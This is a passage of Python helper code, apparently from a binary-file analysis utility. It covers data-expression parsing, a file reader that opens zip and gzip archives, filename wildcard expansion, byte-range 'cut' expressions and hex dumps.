    words = ['lorem', 'ipsum', 'dolor', 'sit', 'amet', 'consectetur', 'adipiscing', 'elit', 'etiam', 'tortor', 'metus', 'cursus', 'sed', 'sollicitudin', 'ac', 'sagittis', 'eget', 'massa', 'praesent', 'sem', 'fermentum', 'dignissim', 'in', 'vel', 'augue', 'scelerisque', 'auctor', 'libero', 'nam', 'a', 'gravida', 'odio', 'duis', 'vestibulum', 'vulputate', 'quam', 'nec', 'cras', 'nibh', 'feugiat', 'ut', 'vitae', 'ornare', 'justo', 'orci', 'varius', 'natoque', 'penatibus', 'et', 'magnis', 'dis', 'parturient', 'montes', 'nascetur', 'ridiculus', 'mus', 'curabitur', 'nisl', 'egestas', 'urna', 'iaculis', 'lectus', 'maecenas', 'ultrices', 'velit', 'eu', 'porta', 'hac', 'habitasse', 'platea', 'dictumst', 'integer', 'id', 'commodo', 'mauris', 'interdum', 'malesuada', 'fames', 'ante', 'primis', 'faucibus', 'accumsan', 'pharetra', 'aliquam', 'nunc', 'at', 'est', 'non', 'leo', 'nulla', 'sodales', 'porttitor', 'facilisis', 'aenean', 'condimentum', 'rutrum', 'facilisi', 'tincidunt', 'laoreet', 'ultricies', 'neque', 'diam', 'euismod', 'consequat', 'tempor', 'elementum', 'lobortis', 'erat', 'ligula', 'risus', 'donec', 'phasellus', 'quisque', 'vivamus', 'pellentesque', 'tristique', 'venenatis', 'purus', 'mi', 'dictum', 'posuere', 'fringilla', 'quis', 'magna', 'pretium', 'felis', 'pulvinar', 'lacinia', 'proin', 'viverra', 'lacus', 'suscipit', 'aliquet', 'dui', 'molestie', 'dapibus', 'mollis', 'suspendisse', 'sapien', 'blandit', 'morbi', 'tellus', 'enim', 'maximus', 'semper', 'arcu', 'bibendum', 'convallis', 'hendrerit', 'imperdiet', 'finibus', 'fusce', 'congue', 'ullamcorper', 'placerat', 'nullam', 'eros', 'habitant', 'senectus', 'netus', 'turpis', 'luctus', 'volutpat', 'rhoncus', 'mattis', 'nisi', 'ex', 'tempus', 'eleifend', 'vehicula', 'class', 'aptent', 'taciti', 'sociosqu', 'ad', 'litora', 'torquent', 'per', 'conubia', 'nostra', 'inceptos', 'himenaeos']
    sample = random.sample(words, random.randint(minimum, maximum))
    sample[0] = sample[0].capitalize()
    return ' '.join(sample) + '.'
def LoremIpsum(sentences):
    """Generate the requested number of random fake-latin sentences, space-joined."""
    generated = []
    for _ in range(sentences):
        generated.append(LoremIpsumSentence(15, 30))
    return ' '.join(generated)
STATE_START = 0
STATE_IDENTIFIER = 1
STATE_STRING = 2
STATE_SPECIAL_CHAR = 3
STATE_ERROR = 4
FUNCTIONNAME_REPEAT = 'repeat'
FUNCTIONNAME_RANDOM = 'random'
FUNCTIONNAME_CHR = 'chr'
FUNCTIONNAME_LOREMIPSUM = 'loremipsum'
def Tokenize(expression):
    """Split an #e# expression into [state, text] tokens.

    Token states: STATE_IDENTIFIER for names/numbers, STATE_STRING for
    single-quoted strings, STATE_SPECIAL_CHAR for punctuation. If a string
    is left unterminated, the whole result is replaced by one STATE_ERROR
    token carrying a message and the partial string.
    """
    result = []
    token = ''
    state = STATE_START
    while expression != '':
        char = expression[0]
        expression = expression[1:]
        if char == "'":
            # A quote opens a string, closes one, or terminates a pending
            # identifier and then opens a string.
            if state == STATE_START:
                state = STATE_STRING
            elif state == STATE_IDENTIFIER:
                result.append([STATE_IDENTIFIER, token])
                state = STATE_STRING
                token = ''
            elif state == STATE_STRING:
                result.append([STATE_STRING, token])
                state = STATE_START
                token = ''
        elif char >= '0' and char <= '9' or char.lower() >= 'a' and char.lower() <= 'z':
            # Alphanumerics start an identifier, or extend the current
            # identifier/string.
            if state == STATE_START:
                token = char
                state = STATE_IDENTIFIER
            else:
                token += char
        elif char == ' ':
            # A space ends an identifier, is literal inside a string, and is
            # ignored elsewhere.
            if state == STATE_IDENTIFIER:
                result.append([STATE_IDENTIFIER, token])
                token = ''
                state = STATE_START
            elif state == STATE_STRING:
                token += char
        else:
            # Any other character is a special-character token (literal
            # inside a string); it also terminates a pending identifier.
            if state == STATE_IDENTIFIER:
                result.append([STATE_IDENTIFIER, token])
                token = ''
                state = STATE_START
                result.append([STATE_SPECIAL_CHAR, char])
            elif state == STATE_STRING:
                token += char
            else:
                result.append([STATE_SPECIAL_CHAR, char])
                token = ''
    # Flush a trailing identifier; an unclosed string is an error.
    if state == STATE_IDENTIFIER:
        result.append([state, token])
    elif state == STATE_STRING:
        result = [[STATE_ERROR, 'Error: string not closed', token]]
    return result
def ParseFunction(tokens):
    """Parse one function call from the front of a token list.

    Returns [[functionname, arguments], remaining_tokens] on success, or
    (None, tokens) after printing 'Parsing error' on failure. A bare string
    token or a 0x-prefixed identifier is shorthand for repeat(1, value).
    """
    if len(tokens) == 0:
        print('Parsing error')
        return None, tokens
    if tokens[0][0] == STATE_STRING or tokens[0][0] == STATE_IDENTIFIER and tokens[0][1].startswith('0x'):
        # Shorthand: 'ABC' or 0x414243 means repeat(1, value).
        return [[FUNCTIONNAME_REPEAT, [[STATE_IDENTIFIER, '1'], tokens[0]]], tokens[1:]]
    if tokens[0][0] != STATE_IDENTIFIER:
        print('Parsing error')
        return None, tokens
    function = tokens[0][1]
    tokens = tokens[1:]
    if len(tokens) == 0:
        print('Parsing error')
        return None, tokens
    # The function name must be followed by an opening parenthesis.
    if tokens[0][0] != STATE_SPECIAL_CHAR or tokens[0][1] != '(':
        print('Parsing error')
        return None, tokens
    tokens = tokens[1:]
    if len(tokens) == 0:
        print('Parsing error')
        return None, tokens
    arguments = []
    # Collect comma-separated arguments until the closing parenthesis.
    while True:
        if tokens[0][0] != STATE_IDENTIFIER and tokens[0][0] != STATE_STRING:
            print('Parsing error')
            return None, tokens
        arguments.append(tokens[0])
        tokens = tokens[1:]
        if len(tokens) == 0:
            print('Parsing error')
            return None, tokens
        # After an argument only ',' (more arguments) or ')' (done) may follow.
        if tokens[0][0] != STATE_SPECIAL_CHAR or (tokens[0][1] != ',' and tokens[0][1] != ')'):
            print('Parsing error')
            return None, tokens
        if tokens[0][0] == STATE_SPECIAL_CHAR and tokens[0][1] == ')':
            tokens = tokens[1:]
            break
        tokens = tokens[1:]
        if len(tokens) == 0:
            print('Parsing error')
            return None, tokens
    return [[function, arguments], tokens]
def Parse(expression):
    """Parse a full #e# expression into a list of [functionname, arguments] calls.

    Function calls are joined with '+'. Returns None (after printing a
    diagnostic) on any tokenizing or parsing error.
    """
    tokens = Tokenize(expression)
    if len(tokens) == 0:
        print('Parsing error')
        return None
    if tokens[0][0] == STATE_ERROR:
        # Tokenizer signalled an unterminated string: report and bail out.
        print(tokens[0][1])
        print(tokens[0][2])
        print(expression)
        return None
    functioncalls = []
    while True:
        functioncall, tokens = ParseFunction(tokens)
        if functioncall == None:
            return None
        functioncalls.append(functioncall)
        if len(tokens) == 0:
            return functioncalls
        # Between calls only the '+' concatenation operator is allowed.
        if tokens[0][0] != STATE_SPECIAL_CHAR or tokens[0][1] != '+':
            print('Parsing error')
            return None
        tokens = tokens[1:]
def InterpretInteger(token):
    """Return the decimal integer value of an identifier token, or None.

    None is returned when the token is not an identifier or its text is not
    a valid decimal integer.
    """
    if token[0] != STATE_IDENTIFIER:
        return None
    try:
        return int(token[1])
    except (TypeError, ValueError):
        # Narrowed from a bare except: only conversion failures mean
        # "not a decimal integer"; anything else should propagate.
        return None
def Hex2Bytes(hexadecimal):
    """Convert a hexadecimal string to bytes; returns None on invalid input.

    An odd-length string is padded with a leading '0' before decoding.
    """
    if len(hexadecimal) % 2 == 1:
        hexadecimal = '0' + hexadecimal
    try:
        return binascii.a2b_hex(hexadecimal)
    except (TypeError, ValueError):
        # Narrowed from a bare except: binascii.Error is a ValueError
        # subclass; only decoding failures should map to None.
        return None
def InterpretHexInteger(token):
    """Return the integer value of a 0x-prefixed identifier token, or None."""
    if token[0] != STATE_IDENTIFIER:
        return None
    if not token[1].startswith('0x'):
        return None
    decoded = Hex2Bytes(token[1][2:])
    if decoded == None:
        return None
    # Accumulate the bytes big-endian into a single integer.
    value = 0
    for onebyte in decoded:
        value = value * 0x100 + C2IIP2(onebyte)
    return value
def InterpretNumber(token):
    """Return a token's numeric value, trying decimal first, then 0x hexadecimal."""
    value = InterpretInteger(token)
    if value is not None:
        return value
    return InterpretHexInteger(token)
def InterpretBytes(token):
    """Return a token's byte-sequence value: string tokens as-is, 0x identifiers decoded.

    Returns None when the token is neither a string nor a 0x-prefixed
    identifier.
    """
    if token[0] == STATE_STRING:
        return token[1]
    if token[0] != STATE_IDENTIFIER or not token[1].startswith('0x'):
        return None
    return Hex2Bytes(token[1][2:])
def CheckFunction(functionname, arguments, countarguments, maxcountarguments=None):
    """Validate the argument count of a parsed function call.

    Prints an error and returns True when the count is wrong; returns
    False when the call is well-formed.
    """
    given = len(arguments)
    if maxcountarguments != None:
        # Ranged arity: between countarguments and maxcountarguments inclusive.
        if given < countarguments or given > maxcountarguments:
            print('Error: function %s takes between %d and %d arguments, %d are given' % (functionname, countarguments, maxcountarguments, given))
            return True
        return False
    # Fixed arity: pick the most specific error message.
    if countarguments == 0 and given != 0:
        print('Error: function %s takes no arguments, %d are given' % (functionname, given))
        return True
    if countarguments == 1 and given != 1:
        print('Error: function %s takes 1 argument, %d are given' % (functionname, given))
        return True
    if countarguments != given:
        print('Error: function %s takes %d arguments, %d are given' % (functionname, countarguments, given))
        return True
    return False
def CheckNumber(argument, minimum=None, maximum=None):
    """Interpret argument as a number and enforce optional bounds.

    Prints an error and returns None on failure, else the integer value.
    """
    value = InterpretNumber(argument)
    if value == None:
        print('Error: argument should be a number: %s' % argument[1])
        return None
    if minimum != None and value < minimum:
        print('Error: argument should be minimum %d: %d' % (minimum, value))
        return None
    if maximum != None and value > maximum:
        print('Error: argument should be maximum %d: %d' % (maximum, value))
        return None
    return value
def Interpret(expression):
    """Evaluate a parsed #e# expression and return the generated data.

    Supported functions: repeat(count, bytes), random(count),
    loremipsum(count), chr(number[, number2]); calls are concatenated
    with '+'. Returns None after printing an error message.
    """
    functioncalls = Parse(expression)
    if functioncalls == None:
        return None
    decoded = ''
    for functioncall in functioncalls:
        functionname, arguments = functioncall
        if functionname == FUNCTIONNAME_REPEAT:
            if CheckFunction(functionname, arguments, 2):
                return None
            number = CheckNumber(arguments[0], minimum=1)
            if number == None:
                return None
            bytes = InterpretBytes(arguments[1])
            if bytes == None:
                print('Error: argument should be a byte sequence: %s' % arguments[1][1])
                return None
            # NOTE(review): InterpretBytes can return bytes (0x form) on Python 3
            # while decoded is str - verify the mixed concatenation for that path.
            decoded += number * bytes
        elif functionname == FUNCTIONNAME_RANDOM:
            if CheckFunction(functionname, arguments, 1):
                return None
            number = CheckNumber(arguments[0], minimum=1)
            if number == None:
                return None
            decoded += ''.join([chr(random.randint(0, 255)) for x in range(number)])
        elif functionname == FUNCTIONNAME_LOREMIPSUM:
            if CheckFunction(functionname, arguments, 1):
                return None
            number = CheckNumber(arguments[0], minimum=1)
            if number == None:
                return None
            decoded += LoremIpsum(number)
        elif functionname == FUNCTIONNAME_CHR:
            if CheckFunction(functionname, arguments, 1, 2):
                return None
            number = CheckNumber(arguments[0], minimum=1, maximum=255)
            if number == None:
                return None
            if len(arguments) == 1:
                decoded += chr(number)
            else:
                # Two arguments: generate the inclusive range, ascending or descending.
                number2 = CheckNumber(arguments[1], minimum=1, maximum=255)
                if number2 == None:
                    return None
                if number < number2:
                    decoded += ''.join([chr(n) for n in range(number, number2 + 1)])
                else:
                    decoded += ''.join([chr(n) for n in range(number, number2 - 1, -1)])
        else:
            print('Error: unknown function: %s' % functionname)
            return None
    return decoded
# FilenameCheckHash result types: a real filename, in-memory data decoded
# from the argument itself, or a decoding error.
FCH_FILENAME = 0
FCH_DATA = 1
FCH_ERROR = 2
def FilenameCheckHash(filename, literalfilename):
    """Classify a filename argument: literal filename or embedded data.

    Prefixes: #h# hexadecimal, #b# base64, #e# expression (see Interpret),
    plain # verbatim text. Returns (FCH_FILENAME, name), (FCH_DATA, data)
    or (FCH_ERROR, encoding-description).
    """
    if literalfilename:
        return FCH_FILENAME, filename
    elif filename.startswith('#h#'):
        result = Hex2Bytes(filename[3:])
        if result == None:
            return FCH_ERROR, 'hexadecimal'
        else:
            return FCH_DATA, result
    elif filename.startswith('#b#'):
        try:
            return FCH_DATA, binascii.a2b_base64(filename[3:])
        except:
            return FCH_ERROR, 'base64'
    elif filename.startswith('#e#'):
        result = Interpret(filename[3:])
        if result == None:
            return FCH_ERROR, 'expression'
        else:
            return FCH_DATA, result
    elif filename.startswith('#'):
        # Bare #: the rest of the argument is the literal content.
        return FCH_DATA, C2BIP3(filename[1:])
    else:
        return FCH_FILENAME, filename
def AnalyzeFileError(filename):
    """Print (via PrintError) diagnostics explaining why opening filename failed.

    Must be called from an exception handler: it reports sys.exc_info().
    """
    PrintError('Error opening file %s' % filename)
    PrintError(sys.exc_info()[1])
    try:
        # Best-effort classification of the failure; ignore secondary errors.
        if not os.path.exists(filename):
            PrintError('The file does not exist')
        elif os.path.isdir(filename):
            PrintError('The file is a directory')
        elif not os.path.isfile(filename):
            PrintError('The file is not a regular file')
    except:
        pass
def CreateZipFileObject(arg1, arg2):
    """Open a zip archive: use AESZipFile when the zipfile module provides
    one (pyzipper), otherwise the standard ZipFile."""
    zipClass = getattr(zipfile, 'AESZipFile', zipfile.ZipFile)
    return zipClass(arg1, arg2)
class cBinaryFile:
    """Uniform binary reader: plain files, stdin (filename ''), #-prefixed
    in-memory data (via FilenameCheckHash), and transparent extraction of
    single-file .zip (password protected) or .gz archives."""
    def __init__(self, filename, zippassword='infected', noextraction=False, literalfilename=False):
        self.filename = filename
        self.zippassword = zippassword
        self.noextraction = noextraction
        self.literalfilename = literalfilename
        self.oZipfile = None
        self.extracted = False
        self.fIn = None
        # Decide whether filename is a real file or embedded data (#h#, #b#, #e#, #...).
        fch, data = FilenameCheckHash(self.filename, self.literalfilename)
        if fch == FCH_ERROR:
            line = 'Error %s parsing filename: %s' % (data, self.filename)
            raise Exception(line)
        try:
            if self.filename == '':
                # Empty filename: read stdin (switched to binary mode on Windows).
                if sys.platform == 'win32':
                    import msvcrt
                    msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
                self.fIn = sys.stdin
            elif fch == FCH_DATA:
                # The data was embedded in the filename argument itself.
                self.fIn = DataIO(data)
            elif not self.noextraction and self.filename.lower().endswith('.zip'):
                self.oZipfile = CreateZipFileObject(self.filename, 'r')
                if len(self.oZipfile.infolist()) == 1:
                    # Single-file archive: transparently open the contained file.
                    self.fIn = self.oZipfile.open(self.oZipfile.infolist()[0], 'r', self.zippassword)
                    self.extracted = True
                else:
                    # Multi-file archive: read the zip container itself.
                    self.oZipfile.close()
                    self.oZipfile = None
                    self.fIn = open(self.filename, 'rb')
            elif not self.noextraction and self.filename.lower().endswith('.gz'):
                self.fIn = gzip.GzipFile(self.filename, 'rb')
                self.extracted = True
            else:
                self.fIn = open(self.filename, 'rb')
        except:
            AnalyzeFileError(self.filename)
            raise
    def close(self):
        # stdin is not ours to close.
        if self.fIn != sys.stdin and self.fIn != None:
            self.fIn.close()
        if self.oZipfile != None:
            self.oZipfile.close()
    def read(self, size=None):
        # Prefer the underlying binary buffer (Python 3 text stdin wraps one).
        try:
            fRead = self.fIn.buffer
        except:
            fRead = self.fIn
        if size == None:
            return fRead.read()
        else:
            return fRead.read(size)
    def Data(self):
        # Read everything and close the file.
        data = self.read()
        self.close()
        return data
#-ENDCODE cBinaryFile--------------------------------------------------------------------------------
def File2Strings(filename):
    """Read a text file (or stdin when filename is '') and return its lines
    without trailing newlines; None on error.

    Fix: return an eagerly-built list instead of a lazy map object (the
    Python 3 behavior of the original), so the result supports len() and
    indexing and matches the Python 2 return type.
    """
    try:
        if filename == '':
            f = sys.stdin
        else:
            f = open(filename, 'r')
    except:
        return None
    try:
        return [line.rstrip('\n') for line in f.readlines()]
    except:
        return None
    finally:
        # Close only files we opened ourselves.
        if f != sys.stdin:
            f.close()
def File2String(filename):
    """Return the raw bytes of a file, or None when opening/reading fails."""
    try:
        fIn = open(filename, 'rb')
    except:
        return None
    try:
        content = fIn.read()
    except:
        content = None
    finally:
        fIn.close()
    return content
def ProcessAt(argument):
    """Expand an @file argument into the lines of that file; any other
    argument is returned as a one-element list. Raises on read error."""
    if not argument.startswith('@'):
        return [argument]
    strings = File2Strings(argument[1:])
    if strings == None:
        raise Exception('Error reading %s' % argument)
    return strings
def Glob(filename):
    """Expand a wildcard pattern; return [filename] itself when nothing matches."""
    matches = glob.glob(filename)
    return matches if len(matches) > 0 else [filename]
class cExpandFilenameArguments():
    """Expand command-line filename arguments: @files, wildcards, recursive
    directory walks, and inline expression/flag arguments recognized by
    their prefixes. Results are [filename, expression, flag] triplets."""
    def __init__(self, filenames, literalfilenames=False, recursedir=False, checkfilenames=False, expressionprefix=None, flagprefix=None):
        self.containsUnixShellStyleWildcards = False
        self.warning = False
        self.message = ''
        self.filenameexpressionsflags = []
        self.expressionprefix = expressionprefix
        self.flagprefix = flagprefix
        self.literalfilenames = literalfilenames
        expression = ''
        flag = ''
        if len(filenames) == 0:
            # No arguments: a single empty filename means read from stdin.
            self.filenameexpressionsflags = [['', '', '']]
        elif literalfilenames:
            self.filenameexpressionsflags = [[filename, '', ''] for filename in filenames]
        elif recursedir:
            for dirwildcard in filenames:
                if expressionprefix != None and dirwildcard.startswith(expressionprefix):
                    # An expression argument applies to the filenames that follow it.
                    expression = dirwildcard[len(expressionprefix):]
                elif flagprefix != None and dirwildcard.startswith(flagprefix):
                    flag = dirwildcard[len(flagprefix):]
                else:
                    if dirwildcard.startswith('@'):
                        # @file: one filename per line.
                        for filename in ProcessAt(dirwildcard):
                            self.filenameexpressionsflags.append([filename, expression, flag])
                    elif os.path.isfile(dirwildcard):
                        self.filenameexpressionsflags.append([dirwildcard, expression, flag])
                    else:
                        if os.path.isdir(dirwildcard):
                            dirname = dirwildcard
                            basename = '*'
                        else:
                            dirname, basename = os.path.split(dirwildcard)
                            if dirname == '':
                                dirname = '.'
                        # Walk the directory tree, matching basename as a wildcard.
                        for path, dirs, files in os.walk(dirname):
                            for filename in fnmatch.filter(files, basename):
                                self.filenameexpressionsflags.append([os.path.join(path, filename), expression, flag])
        else:
            # Expand @files, then wildcards, deduplicating while keeping order.
            for filename in list(collections.OrderedDict.fromkeys(sum(map(self.Glob, sum(map(ProcessAt, filenames), [])), []))):
                if expressionprefix != None and filename.startswith(expressionprefix):
                    expression = filename[len(expressionprefix):]
                elif flagprefix != None and filename.startswith(flagprefix):
                    flag = filename[len(flagprefix):]
                else:
                    self.filenameexpressionsflags.append([filename, expression, flag])
        self.warning = self.containsUnixShellStyleWildcards and len(self.filenameexpressionsflags) == 0
        if self.warning:
            self.message = "Your filename argument(s) contain Unix shell-style wildcards, but no files were matched.\nCheck your wildcard patterns or use option literalfilenames if you don't want wildcard pattern matching."
            return
        if self.filenameexpressionsflags == [] and (expression != '' or flag != ''):
            # Only an expression/flag was given: apply it to stdin.
            self.filenameexpressionsflags = [['', expression, flag]]
        if checkfilenames:
            self.CheckIfFilesAreValid()
    def Glob(self, filename):
        # Only glob when the argument actually contains wildcard characters.
        if not ('?' in filename or '*' in filename or ('[' in filename and ']' in filename)):
            return [filename]
        self.containsUnixShellStyleWildcards = True
        return glob.glob(filename)
    def CheckIfFilesAreValid(self):
        """Drop non-existing/non-regular files, recording a warning message."""
        valid = []
        doesnotexist = []
        isnotafile = []
        for filename, expression, flag in self.filenameexpressionsflags:
            hashfile = False
            try:
                hashfile = FilenameCheckHash(filename, self.literalfilenames)[0] == FCH_DATA
            except:
                pass
            if filename == '' or hashfile:
                # stdin and embedded-data arguments are always valid.
                valid.append([filename, expression, flag])
            elif not os.path.exists(filename):
                doesnotexist.append(filename)
            elif not os.path.isfile(filename):
                isnotafile.append(filename)
            else:
                valid.append([filename, expression, flag])
        self.filenameexpressionsflags = valid
        if len(doesnotexist) > 0:
            self.warning = True
            self.message += 'The following files do not exist and will be skipped: ' + ' '.join(doesnotexist) + '\n'
        if len(isnotafile) > 0:
            self.warning = True
            self.message += 'The following files are not regular files and will be skipped: ' + ' '.join(isnotafile) + '\n'
    def Filenames(self):
        # Without an expressionprefix, callers only want the filenames.
        if self.expressionprefix == None:
            return [filename for filename, expression, flag in self.filenameexpressionsflags]
        else:
            return self.filenameexpressionsflags
def CheckJSON(stringJSON):
    """Validate and deserialize the JSON items produced by companion tools.

    The object must be a version-2 'didierstevens.com' content dictionary;
    on success the base64 content of every item is decoded in place and the
    list of items is returned, otherwise None (after printing an error).
    """
    try:
        object = json.loads(stringJSON)
    except:
        print('Error parsing JSON')
        print(sys.exc_info()[1])
        return None
    if not isinstance(object, dict):
        print('Error JSON is not a dictionary')
        return None
    # Required top-level keys, their expected values, and the error messages.
    requiredPairs = [
        ('version', 2, 'Error JSON dictionary has no version', 'Error JSON dictionary has wrong version'),
        ('id', 'didierstevens.com', 'Error JSON dictionary has no id', 'Error JSON dictionary has wrong id'),
        ('type', 'content', 'Error JSON dictionary has no type', 'Error JSON dictionary has wrong type'),
    ]
    for key, expected, missingMessage, wrongMessage in requiredPairs:
        if not key in object:
            print(missingMessage)
            return None
        if object[key] != expected:
            print(wrongMessage)
            return None
    if not 'fields' in object:
        print('Error JSON dictionary has no fields')
        return None
    if not 'name' in object['fields']:
        print('Error JSON dictionary has no name field')
        return None
    if not 'content' in object['fields']:
        print('Error JSON dictionary has no content field')
        return None
    if not 'items' in object:
        print('Error JSON dictionary has no items')
        return None
    for item in object['items']:
        # Item content is transported base64-encoded; decode it in place.
        item['content'] = binascii.a2b_base64(item['content'])
    return object['items']
# Cut-expression term types (see ParseCutTerm/ParseCutArgument/CutData).
CUTTERM_NOTHING = 0
CUTTERM_POSITION = 1
CUTTERM_FIND = 2
CUTTERM_LENGTH = 3
def Replace(string, dReplacements):
    """Return the replacement for string from dReplacements, or string itself."""
    return dReplacements.get(string, string)
def ParseInteger(argument):
    """Parse a decimal or 0x-hexadecimal integer with an optional +/- sign."""
    sign = 1
    if argument[0:1] == '+':
        argument = argument[1:]
    elif argument[0:1] == '-':
        sign = -1
        argument = argument[1:]
    base16 = argument.startswith('0x')
    return sign * (int(argument[2:], 16) if base16 else int(argument))
def ParseCutTerm(argument):
    """Parse one term of a cut expression.

    Returns (type, value, remainder): CUTTERM_NOTHING, CUTTERM_POSITION
    (value = signed byte position) or CUTTERM_FIND (value = (searchbytes,
    occurrence, offset)); type None signals a parse failure. The matchers
    are tried in order; each 'else' branch handles the previous match.
    """
    if argument == '':
        return CUTTERM_NOTHING, None, ''
    # 1st: hexadecimal position, e.g. 0x10 or -0x10.
    oMatch = re.match(r'\-?0x([0-9a-f]+)', argument, re.I)
    if oMatch == None:
        # 2nd: decimal position, e.g. 24 or -24.
        oMatch = re.match(r'\-?(\d+)', argument)
    else:
        value = int(oMatch.group(1), 16)
        if argument.startswith('-'):
            value = -value
        return CUTTERM_POSITION, value, argument[len(oMatch.group(0)):]
    if oMatch == None:
        # 3rd: hexadecimal search term [hex]occurrence+/-offset.
        oMatch = re.match(r'\[([0-9a-f]+)\](\d+)?([+-](?:0x[0-9a-f]+|\d+))?', argument, re.I)
    else:
        value = int(oMatch.group(1))
        if argument.startswith('-'):
            value = -value
        return CUTTERM_POSITION, value, argument[len(oMatch.group(0)):]
    if oMatch == None:
        # 4th: literal (or u'...' unicode) search term ['text']occurrence+/-offset.
        oMatch = re.match(r"\[u?\'(.+?)\'\](\d+)?([+-](?:0x[0-9a-f]+|\d+))?", argument)
    else:
        if len(oMatch.group(1)) % 2 == 1:
            raise Exception("Uneven length hexadecimal string")
        else:
            # Defaults: occurrence 1, offset 0.
            return CUTTERM_FIND, (binascii.a2b_hex(oMatch.group(1)), int(Replace(oMatch.group(2), {None: '1'})), ParseInteger(Replace(oMatch.group(3), {None: '0'}))), argument[len(oMatch.group(0)):]
    if oMatch == None:
        return None, None, argument
    else:
        if argument.startswith("[u'"):
            # convert ascii to unicode 16 byte sequence
            searchtext = oMatch.group(1).decode('unicode_escape').encode('utf16')[2:]
        else:
            searchtext = oMatch.group(1)
        return CUTTERM_FIND, (searchtext, int(Replace(oMatch.group(2), {None: '1'})), ParseInteger(Replace(oMatch.group(3), {None: '0'}))), argument[len(oMatch.group(0)):]
def ParseCutArgument(argument):
    """Parse a complete cut expression of the form 'left:right'.

    Returns (typeLeft, valueLeft, typeRight, valueRight), all four None on
    error. A trailing 'l' after the right position turns it into a length.
    """
    type, value, remainder = ParseCutTerm(argument.strip())
    if type == CUTTERM_NOTHING:
        return CUTTERM_NOTHING, None, CUTTERM_NOTHING, None
    elif type == None:
        if remainder.startswith(':'):
            # Empty left term, e.g. ':0x20'.
            typeLeft = CUTTERM_NOTHING
            valueLeft = None
            remainder = remainder[1:]
        else:
            return None, None, None, None
    else:
        typeLeft = type
        valueLeft = value
        # Left position must be non-negative; a find term needs occurrence > 0.
        if typeLeft == CUTTERM_POSITION and valueLeft < 0:
            return None, None, None, None
        if typeLeft == CUTTERM_FIND and valueLeft[1] == 0:
            return None, None, None, None
        if remainder.startswith(':'):
            remainder = remainder[1:]
        else:
            return None, None, None, None
    type, value, remainder = ParseCutTerm(remainder)
    if type == CUTTERM_POSITION and remainder == 'l':
        # 'l' suffix: the right value is a length relative to the start.
        return typeLeft, valueLeft, CUTTERM_LENGTH, value
    elif type == None or remainder != '':
        return None, None, None, None
    elif type == CUTTERM_FIND and value[1] == 0:
        return None, None, None, None
    else:
        return typeLeft, valueLeft, type, value
def Find(data, value, nth, startposition=-1):
    """Return the position of the nth occurrence of value in data, searching
    after startposition; -1 when there are fewer than nth occurrences."""
    position = startposition
    for _ in range(nth):
        position = data.find(value, position + 1)
        if position == -1:
            return -1
    return position
def CutData(stream, cutArgument):
    """Cut a byte slice out of stream according to cutArgument ('left:right').

    Returns [slice, beginposition, endposition]; the full stream when the
    expression is empty or invalid, and ['', None, None] when a search
    term is not found.
    """
    if cutArgument == '':
        return [stream, None, None]
    typeLeft, valueLeft, typeRight, valueRight = ParseCutArgument(cutArgument)
    if typeLeft == None:
        # Invalid expression: return the stream untouched.
        return [stream, None, None]
    if typeLeft == CUTTERM_NOTHING:
        positionBegin = 0
    elif typeLeft == CUTTERM_POSITION:
        positionBegin = valueLeft
    elif typeLeft == CUTTERM_FIND:
        positionBegin = Find(stream, valueLeft[0], valueLeft[1])
        if positionBegin == -1:
            return ['', None, None]
        positionBegin += valueLeft[2]
    else:
        raise Exception("Unknown value typeLeft")
    if typeRight == CUTTERM_NOTHING:
        positionEnd = len(stream)
    elif typeRight == CUTTERM_POSITION and valueRight < 0:
        # Negative right position counts back from the end of the stream.
        positionEnd = len(stream) + valueRight
    elif typeRight == CUTTERM_POSITION:
        positionEnd = valueRight + 1
    elif typeRight == CUTTERM_LENGTH:
        positionEnd = positionBegin + valueRight
    elif typeRight == CUTTERM_FIND:
        positionEnd = Find(stream, valueRight[0], valueRight[1], positionBegin)
        if positionEnd == -1:
            return ['', None, None]
        else:
            # Include the found term itself in the cut.
            positionEnd += len(valueRight[0])
        positionEnd += valueRight[2]
    else:
        raise Exception("Unknown value typeRight")
    return [stream[positionBegin:positionEnd], positionBegin, positionEnd]
#-BEGINCODE cDump------------------------------------------------------------------------------------
#import binascii
#import sys
#if sys.version_info[0] >= 3:
# from io import StringIO
#else:
# from cStringIO import StringIO
class cDump():
    """Render binary data as hex, hex/ascii (optionally run-length collapsed)
    or base64 dumps, each line prefixed with prefix and offset-adjusted."""
    def __init__(self, data, prefix='', offset=0, dumplinelength=16):
        self.data = data
        self.prefix = prefix
        self.offset = offset
        self.dumplinelength = dumplinelength
    def HexDump(self):
        """Return a pure hexadecimal dump, dumplinelength bytes per line."""
        oDumpStream = self.cDumpStream(self.prefix)
        hexDump = ''
        for i, b in enumerate(self.data):
            if i % self.dumplinelength == 0 and hexDump != '':
                oDumpStream.Addline(hexDump)
                hexDump = ''
            hexDump += IFF(hexDump == '', '', ' ') + '%02X' % self.C2IIP2(b)
        oDumpStream.Addline(hexDump)
        return oDumpStream.Content()
    def CombineHexAscii(self, hexDump, asciiDump):
        # Pad the hex column so the ascii column lines up on a short last line.
        if hexDump == '':
            return ''
        countSpaces = 3 * (self.dumplinelength - len(asciiDump))
        if len(asciiDump) <= self.dumplinelength / 2:
            countSpaces += 1
        return hexDump + '  ' + (' ' * countSpaces) + asciiDump
    def HexAsciiDump(self, rle=False):
        """Hex/ascii dump; with rle=True repeated lines collapse into '* count' markers."""
        oDumpStream = self.cDumpStream(self.prefix)
        position = ''
        hexDump = ''
        asciiDump = ''
        previousLine = None
        countRLE = 0
        for i, b in enumerate(self.data):
            b = self.C2IIP2(b)
            if i % self.dumplinelength == 0:
                if hexDump != '':
                    line = self.CombineHexAscii(hexDump, asciiDump)
                    if not rle or line != previousLine:
                        if countRLE > 0:
                            # Flush the pending run-length marker first.
                            oDumpStream.Addline('* %d 0x%02x' % (countRLE, countRLE * self.dumplinelength))
                        oDumpStream.Addline(position + line)
                        countRLE = 0
                    else:
                        countRLE += 1
                    previousLine = line
                position = '%08X:' % (i + self.offset)
                hexDump = ''
                asciiDump = ''
            if i % self.dumplinelength == self.dumplinelength / 2:
                # Extra gap at the middle of the line.
                hexDump += ' '
            hexDump += ' %02X' % b
            asciiDump += IFF(b >= 32 and b < 128, chr(b), '.')
        if countRLE > 0:
            oDumpStream.Addline('* %d 0x%02x' % (countRLE, countRLE * self.dumplinelength))
        oDumpStream.Addline(self.CombineHexAscii(position + hexDump, asciiDump))
        return oDumpStream.Content()
    def Base64Dump(self, nowhitespace=False):
        """Base64 dump, wrapped at 64 characters unless nowhitespace is True."""
        encoded = binascii.b2a_base64(self.data)
        if nowhitespace:
            return encoded
